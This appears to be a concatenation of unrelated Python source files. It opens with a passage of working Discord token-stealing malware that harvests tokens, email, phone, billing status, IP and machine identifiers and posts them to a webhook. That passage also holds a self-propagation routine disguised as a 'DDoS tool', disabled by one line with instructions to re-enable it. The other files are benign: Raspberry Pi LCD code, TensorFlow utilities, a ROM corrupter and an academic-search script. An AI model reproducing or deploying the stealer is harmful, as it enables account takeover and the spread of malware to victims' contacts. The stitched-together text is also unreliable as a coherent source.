urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
def getTokenz(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def whoTheFuckAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled (If you remove this line, malware will spread itself by sending the binary to friends.)
for friend in getFriends(token):
try:
chat_id = getChat(token, friend["id"])
sendMessages(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = whoTheFuckAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "|Account Info|",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "|PC Info|",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "|Token|",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
},
"footer": {
"text": f"Visit my website for more Cybersecurity contents: un5t48l3.com"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Token xDxD",
"avatar_url": "https://mehmetcanyildiz.com/wp-content/uploads/2020/11/black.png"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getHeader()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nDDoS tool. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
lcd_1602_thread.py
|
# Display RPi info on a monochromatic character LCD
# Version: v1.0
# Author: Nikola Jovanovic
# Date: 04.09.2020.
# Repo: https://github.com/etfovac/rpi_lcd
# SW: Python 3.7.3
# HW: Pi Model 3B V1.2, LCD 1602 module (HD44780, 5V, Blue backlight, 16 chars, 2 lines), Bi-Polar NPN Transistor (2N3904 or eq)
# https://learn.adafruit.com/character-lcds/python-circuitpython
# https://www.mbtechworks.com/projects/drive-an-lcd-16x2-display-with-raspberry-pi.html
# https://www.rototron.info/using-an-lcd-display-with-inputs-interrupts-on-raspberry-pi/
# https://www.rototron.info/lcd-display-tutorial-for-raspberry-pi/#downloads
# https://www.raspberrypi-spy.co.uk/2012/07/16x2-lcd-module-control-using-python/
# https://www.elprocus.com/lcd-16x2-pin-configuration-and-its-working/
# https://learn.adafruit.com/drive-a-16x2-lcd-directly-with-a-raspberry-pi/python-code
# https://bogotobogo.com/python/Multithread/python_multithreading_Event_Objects_between_Threads.php
# https://pypi.org/project/pynput/
# https://components101.com/transistors/bc548-npn-transistor
import board
import digitalio
import adafruit_character_lcd.character_lcd as characterlcd
from time import sleep, strftime
import datetime
import psutil
import signal
import threading
from pynput import keyboard
import sys
import os
sys.path.append(os.path.abspath(".."))
import config.printout_info as cpi
import config.printout_format as cpf
def lcd_setup(lcd_columns = 16,lcd_rows = 2):
# Raspberry Pi Pin Config:
lcd_rs = digitalio.DigitalInOut(board.D26)
lcd_en = digitalio.DigitalInOut(board.D19)
lcd_d7 = digitalio.DigitalInOut(board.D13)
lcd_d6 = digitalio.DigitalInOut(board.D6)
lcd_d5 = digitalio.DigitalInOut(board.D5)
lcd_d4 = digitalio.DigitalInOut(board.D22)
lcd_backlight = digitalio.DigitalInOut(board.D27)
# a NPN transistor's Base switches the LED backlight on/off
# Init lcd class obj
lcd = characterlcd.Character_LCD_Mono(
lcd_rs, lcd_en,
lcd_d4, lcd_d5, lcd_d6, lcd_d7,
lcd_columns, lcd_rows, lcd_backlight
)
lcd.text_direction = lcd.LEFT_TO_RIGHT
lcd.backlight = True
lcd.clear()
lcd.blink = True
lcd_msg(lcd,"<Setup>...")
lcd.cursor = True
msg_list = cpi.lcd_msg_list(lcd_columns, lcd_rows)
return lcd, msg_list
def lcd_msg(lcd,msg_str):
lcd.clear()
sleep(0.1)
lcd.message = msg_str
print(lcd.message)
def lcd_printout(lcd,msg_list,delay):
#print(msg_list)
try:
for msg in msg_list:
lcd_msg(lcd,msg)
sleep(delay)
except KeyboardInterrupt:
print('<CTRL-C> Printout cancelled. Press CTRL-C to stop execution.')
def lcd_printout_timeout(lcd,msg_list,event,timeout_sec):
# Triggered on event timeout
cntr=0
while not event.isSet():
cntr+=cntr
#print(cntr) #=0 => e.wait works
event_is_set = event.wait(timeout_sec)
if event_is_set:
lcd_printout(lcd,msg_list,1.5)
event.clear() # clear isSet flag in event
else:
lcd_msg(lcd,cpf.msg_form(cpi.lcd_timestamp()[0:2]))
def lcd_printout_timeout2(lcd,msg_list,event,timeout_sec):
# Triggered on event timeout
while not event.isSet():
event_is_set = event.wait(timeout_sec)
if not(event_is_set): # periodic remainder
lcd_printout(lcd,msg_list,3)
lcd_event_print = threading.Event()
lcd_event_print2 = threading.Event() # not used
def on_press(key):
global lcd_event_print # couldn't add param to this callback
# Keyboard interupt triggers thread event:
if key == keyboard.Key.page_down: lcd_event_print.set()
# try:
# print('alphanumeric key {0} pressed'.format(key.char))
# except AttributeError:
# print('special key {0} pressed'.format(key))
def on_release(key):
if key == keyboard.Key.esc:
print('{0} released - Stopping the keyboard listener'.format(key))
return False
def main():
def interrupt_signal_handler(signum, frame):
print('Interrupt signal ' + str(signum) +
' on line ' + str(frame.f_lineno) +
' in ' + frame.f_code.co_filename)
listener.stop()
lcd.backlight = False # Turns off the LED backlight
sys.exit(0)
[lcd,msg_lists] = lcd_setup()
#lcd_thread = threading.Thread(target=lcd_printout, args=())
#lcd_thread.start()
timeout_sec = [1,6]
lcd_thread = threading.Thread(name='non-blocking',
target = lcd_printout_timeout,
args = (lcd,msg_lists[0],lcd_event_print,timeout_sec[0]))
lcd_thread2 = threading.Thread(name='non-blocking',
target = lcd_printout_timeout2,
args = (lcd,msg_lists[1],lcd_event_print2,timeout_sec[1]))
lcd_thread.start()
lcd_thread2.start()
listener = keyboard.Listener(on_press=on_press, on_release=on_release)
listener.start()
listener.wait()
signal.signal(signal.SIGINT, interrupt_signal_handler) #Terminal interrupt signal
signal.pause()
if __name__ == "__main__":
main()
|
watchdog.py
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Watchdog that monitors activity of ClusterCoordinator."""
import faulthandler
import os
import sys
import threading
import time
from absl import logging
class WatchDog(object):
"""A class to dump stack traces if no activity happens in ClusterCoordinator."""
def __init__(self,
timeout=os.environ.get(
"TF_CLUSTER_COORDINATOR_WATCH_DOG_TIMEOUT", -1),
traceback_file=sys.stdout,
on_triggered=None):
self._timeout = timeout
self._last_activity_time = time.time()
self._traceback_file = traceback_file
self._on_triggered = on_triggered
self._stopped = False
if timeout > 0:
self._watchdog_thread = threading.Thread(
target=self._watchdog_function, name="WatchDog", daemon=True)
self._watchdog_thread.start()
def stop(self):
self._stopped = True
def _watchdog_function(self):
"""The watchdog thread."""
logging.info("Starting watchdog thread with timeout %r", self._timeout)
while not self._stopped:
time.sleep(self._timeout / 10.0)
current_time = time.time()
if current_time - self._last_activity_time >= self._timeout:
logging.warning(
"No activity for ClusterCoordinator for %r seconds. "
"Dumping stack traces.", self._timeout)
if self._on_triggered:
self._on_triggered()
faulthandler.dump_traceback(file=self._traceback_file)
self._traceback_file.write("==== End of stack traces ====\n")
self._last_activity_time = current_time
def report_closure_done(self):
if self._timeout > 0:
self._last_activity_time = time.time()
|
multicorrupt.py
|
from multiprocessing import Process, Pool, cpu_count
from functools import partial
from sys import argv
import random, math, array, os, subprocess, time
def calc_mupen_res(N,region_w,region_h):
"""find res to fit N mupen instances in region"""
results = []
for row_length in range(1,N+1):
col_length = math.ceil(N/float(row_length))
instance_width = int(math.floor( min(640, region_w/float(row_length) )))
instance_height = int(math.floor(instance_width*(480.0/640.0)))
if instance_height*col_length <= region_h and instance_width*row_length <= region_w:
results.append((instance_width, instance_height))
return max(results)
#fit to region with space saved on right and bottom edge
mupen_instances = 20
screen_res = (1920,1200)
savespace = (400, 150)
RESW, RESH = screen_res[0]-savespace[0], screen_res[1]-savespace[1]
instance_res = calc_mupen_res(mupen_instances, RESW, RESH)
print(instance_res)
#USAGE: python3 multicorrupt.py original_roms/BK64.n64
#outputs a bunch of roms to output_roms/ramdisk/ and launches them with mupen64plus
#depends on patched version of mupen that accepts --position parameter for window
class Corruption(object):
def __init__(self, L, id, static_changes_string=None):
self.id = id
self.L = L[:]
if static_changes_string:
self.make_static_changes(static_changes_string)
else:
#self.mutate(20, spot=mupen_instances*4 + id-1, step=1)
self.mutate(50, spot=15, step=5)
def mutate(self, mutation_count, spot, step):
'''count=number of changes to make in each instance,
spot=byte to skip to in percent of total rom length (including 4096 first bytes)
step=length of range to affect in percent of total rom length (overshooting rounds to full length)
'''
N = len(self.L) - 1
start_byte = int(max(4096, round((N/100.0)*spot)) )
end_byte = int(min(N, round((N/100.0)*(spot+step))))
self.change_generator(start_byte,end_byte,mutation_count)
print('Mutations: {} at {}% (to {}%) {}-->{} ({})'.format(
mutation_count, spot, min(100, spot+step),
start_byte, end_byte,
1 + end_byte - start_byte))
def save(self, out_dir, basename='generic_filename.n64'):
"""Save corrupted rom and changelist"""
s2 = array.array('B', self.L)
ext_index = basename.rindex('.')
filename = '{}_corrupted_{}{}'.format(basename[0:ext_index],
self.id,
basename[ext_index:])
out_path = os.path.join(out_dir, filename)
print(out_path)
#write the corrupted ROM
with open(out_path, 'wb') as f:
f.write(s2)
#write a textfile where each line is an index (for rom byte), a space, and the new value for that index
with open(out_path + '.changes', 'w') as f:
f.write('\n'.join(' '.join(str(x) for x in tup) for tup in self.changes_made).strip() + '\n')
return out_path
def make_static_changes(self, static_changes_string):
changelist = [[int(x) for x in x.split()] for x in static_changes_string.split('\n') if '#' not in x]
self.changes_made = changelist
print('Static changes (id: {}):'.format(self.id))
for index,new_value in changelist:
old = self.L[index]
self.L[index] = new_value
print(' {}:\t{} --> {}'.format(index, old, new_value))
def change_generator(self, start_byte, end_byte, mutation_count):
self.changes_made = []
for i in range(mutation_count):
index = random.randint(start_byte, end_byte)
change = random.randint(0,255)
self.L[index] = change
#self.L[index] = (self.L[index] + random.randint(1,2)) % 255
self.changes_made.append((index, self.L[index]))
def launch_single(instance_number,corrupted_rom_path):
def calc_instance_position(i):
instances_per_row = (RESW)//instance_res[0]
#X = [0,1,2, ... ,0,1,2,...]*width + pixel_offset
x = (i%instances_per_row)*instance_res[0] + 2*(i%instances_per_row)
#y = height*[0,0,0,...,1,1,1,...,2,2,2,...] + pixel_offset
y = instance_res[1]*(i//instances_per_row) + 2*(i//instances_per_row)
return x,y
res = "%dx%d" % instance_res
pos = "%d,%d" % calc_instance_position(instance_number)
env = os.environ.copy()
env['SDL_VIDEO_WINDOW_POS'] = pos
p = subprocess.Popen(['mupen64plus', '--nosaveoptions', '--resolution', res, corrupted_rom_path], env=env)
#p = subprocess.Popen(['mupen64plus', '--nosaveoptions', '--resolution', res, '--position', pos, corrupted_rom_path])
def launch_many(path_list):
processes = [Process(target=launch_single, args=(i,path)) for (i,path) in enumerate(path_list)]
for p in processes:
p.start()
def generate_corrupted_rom(L, out_dir, rom_path, i):
corruption = Corruption(L, i+1) #start counting from 1
path = corruption.save(out_dir=out_dir, basename=os.path.basename(rom_path))
#free memory as these are not needed after saving
del corruption.L
del corruption.changes_made
return path
def load_rom(rom_path):
with open(rom_path, 'rb') as f:
return list(f.read())
def main(rom_path, changelist):
L = load_rom(rom_path)
if changelist:
corruption = Corruption(L, 'static', changelist)
out_path = corruption.save(out_dir=out_dir, basename=os.path.basename(rom_path))
launch_single(0, out_path)
else:
#generate corruptions first, then launch. Generating takes a while, so launching
#all at once makes them almost synced, so that it is easier to notice differences
pool = Pool(processes=max(2, cpu_count()//2))
func = partial(generate_corrupted_rom, L, out_dir, rom_path)
out_paths = pool.map(func, range(mupen_instances))
time.sleep(1)
launch_many(out_paths)
if __name__ == '__main__':
out_dir = os.path.join( os.path.dirname(argv[0]), 'output_roms', 'ramdisk' )
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if len(argv) > 2:
with open(argv[2]) as f:
static_changes_string = f.read().strip()
else:
static_changes_string = None
in_path = argv[1]
main(in_path, static_changes_string)
|
author.py
|
"""
Test Module
"""
import os
import sys
import json
from os.path import join, dirname
from random import randint
from queue import Queue
from threading import Thread
from time import sleep
from dotenv import load_dotenv
from optparse import IndentedHelpFormatter, OptionGroup, OptionParser
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
try:
import maka
except ImportError:
import inspect
CURRENT_DIR = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
PARENT_DIR = os.path.dirname(CURRENT_DIR)
os.sys.path.insert(0, PARENT_DIR)
import maka
DELAY = 1
NUM_QUERIER_THREADS = 2
ROOT = {'author': None, 'aliases': [], 'articles': []}
THE_QUEUE = Queue()
def find_article(article, parent=None):
if parent is not None:
for p in ROOT['articles']:
if p['id'] == parent and p['cites']:
for art in p['cites']:
if art['id'] == article:
return art
else:
for art in ROOT['articles']:
if art['id'] == article:
return art
return None
def querier_enclosure(i, q):
"""
Wrapper for the query procedure in order to be used in a Worker
"""
while True:
print('Worker {}: Looking for the next query'.format(i))
args = q.get()
query = maka.AcademicQuerier(args['query_type'], args['payload'])
if query is not None:
results = query.post()
if results:
if args['query_type'] == maka.AcademicQueryType.INTERPRET:
expr = 'OR({})'.format(','.join([interpretation['rules'][0]['value']
for interpretation in results]))
THE_QUEUE.put({
'query_type': maka.AcademicQueryType.EVALUATE,
'payload': {
'expr': expr,
'attributes': '*'
},
'parent': None
})
elif args['query_type'] == maka.AcademicQueryType.EVALUATE:
parent = args.get('parent', None)
branch = ROOT['articles'] if parent is None else (find_article(parent))['cites']
for result in results:
article = find_article(result['id'], parent)
if article is None:
branch.append(result)
if parent is None:
expr = 'RId={}'.format(result['id'])
THE_QUEUE.put({
'query_type': maka.AcademicQueryType.EVALUATE,
'payload': {
'expr': expr,
'attributes': '*'
},
'parent': result['id']
})
total = len(branch)
if total%50 == 0:
new_payload = args['payload'].copy()
new_payload['offset'] = total
THE_QUEUE.put({
'query_type': args['query_type'],
'payload': new_payload,
'parent': args['parent']
})
q.task_done()
sleep(DELAY)
def main():
"""
The method called when running this script
"""
usage = """author.py --author "albert einstein"
A command-line interface to Microsoft's Academic Knowledge."""
fmt = IndentedHelpFormatter(max_help_position=50, width=100)
parser = OptionParser(usage=usage, formatter=fmt)
group = OptionGroup(parser, 'Query arguments',
'These options define search query arguments and parameters.')
group.add_option('-a', '--author', metavar='AUTHORS', default=None,
help='Author name(s)')
parser.add_option_group(group)
options, _ = parser.parse_args()
# Show help if we have no author name
if len(sys.argv) == 1:
parser.print_help()
return 1
for i in range(NUM_QUERIER_THREADS):
worker = Thread(target=querier_enclosure, args=(i, THE_QUEUE,))
worker.setDaemon(True)
worker.start()
ROOT['author'] = options.author
THE_QUEUE.put({
'query_type': maka.AcademicQueryType.INTERPRET,
'payload': {
'query': 'papers by {}'.format(options.author)
}
})
print('*** Main thread waiting')
THE_QUEUE.join()
with open('{}.json'.format(ROOT['author'].replace(' ', '')), 'w') as outfile:
json.dump(ROOT, outfile, cls=maka.classes.AcademicEncoder, indent=4)
print('*** Done')
if __name__ == "__main__":
sys.exit(main())
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the above import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
